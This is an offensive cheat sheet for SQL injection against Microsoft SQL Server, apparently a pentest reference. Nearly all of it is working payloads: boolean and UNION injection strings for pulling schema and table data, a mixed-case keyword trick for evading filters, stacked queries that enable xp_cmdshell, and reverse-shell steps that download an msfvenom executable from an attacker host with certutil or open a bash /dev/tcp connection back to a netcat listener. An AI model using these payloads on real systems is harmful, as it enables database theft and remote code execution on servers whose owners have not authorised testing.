Microsoft SQL Injection

List of commands

Basic Commands

  • ?param=' OR 1=1--

  • ?param=' OR 1=2--

    If the two responses differ, the parameter is injectable, and the pair gives a true/false baseline for blind probes. In T-SQL, -- comments out the rest of the line; unlike MySQL, no trailing space is needed after it.

  • COLUMN COUNT: ?param=' ORDER BY 1--, then ' ORDER BY 2--, ' ORDER BY 3--, and so on. The first number that produces an error is one more than the number of columns in the original query.

  • NULL PADDING: ?param=' UNION SELECT null,null,null,null-- (one null per column) confirms the count. Then swap one null at a time for a string such as 'a': the positions that do not raise a conversion error and show up in the page are the ones to put data in.

  • TABLE NAME: ?param=' UNION SELECT table_name FROM information_schema.tables-- (for a one-column query; pad with nulls to match the column count)

  • COLUMN NAME: ?param=' UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'table1'--

  • MODIFIED UNION: ?param=' UnIoN SELECT key1, key2, key3 FROM table1-- (mixed case slips past filters that match the literal keyword UNION; T-SQL keywords are case-insensitive)

Getting Shell

Using xp_cmdshell: xp_cmdshell is an extended stored procedure in Microsoft SQL Server that runs an operating system command from inside the database engine and returns the command's output as rows. It is disabled by default. It can be turned on through sp_configure when the login the web application uses is a member of the sysadmin fixed server role: changing a configuration option with sp_configure and running RECONFIGURE require the ALTER SETTINGS server permission (implicitly held by sysadmin and serveradmin), and executing xp_cmdshell itself requires sysadmin membership, or an explicit EXECUTE grant plus a configured proxy credential. The spawned process runs as the SQL Server service account (non-sysadmin callers go through the proxy account), so the privileges of the shell you get depend on how the service was installed. The procedure is synchronous: the query, and with it the HTTP request carrying the injection, does not return until the command exits.

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Injection command to turn on xp_cmdshell: ?param='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --

This works because SQL Server accepts stacked queries: the quote closes the injected string literal, the semicolon ends the application's own statement, the extra statements run in the same batch, and -- comments out whatever the application appends. URL-encode the payload (spaces, quotes, semicolons) when sending it in a GET parameter.

Setting up a reverse shell

On Windows:

  1. Use MSFvenom to generate a reverse shell: msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=4444 -f exe -o reverse.exe

  2. Set up a simple HTTP server in the directory holding reverse.exe: python3 -m http.server 8080

  3. Injection command to fetch the reverse shell (the SQL Server service account needs outbound HTTP to $IP:8080, and certutil downloads are a well-known LOLBin pattern that endpoint monitoring commonly flags): ?param='; EXEC xp_cmdshell 'certutil -urlcache -f http://$IP:8080/reverse.exe C:\Windows\Temp\reverse.exe'; --

  4. Listener on attack machine: nc -nvlp 4444

  5. Injection to execute the reverse shell (this request hangs for as long as the shell is alive, because xp_cmdshell waits for the process to exit): ?param='; EXEC xp_cmdshell 'C:\Windows\Temp\reverse.exe';--

On Linux (SQL Server on Linux, where the spawned process runs as the mssql service user):

  1. Listener on attack machine: nc -nvlp 1337

  2. Injection to execute the reverse shell: ?param='; EXEC xp_cmdshell 'bash -c "bash -i >& /dev/tcp/$IP/1337 0>&1"'; --

     The >& /dev/tcp redirection is bash syntax and is parsed by the shell that runs the command line, not by the bash it starts, so wrap it in bash -c. Using double quotes inside the command avoids having to double every single quote inside the T-SQL string literal.
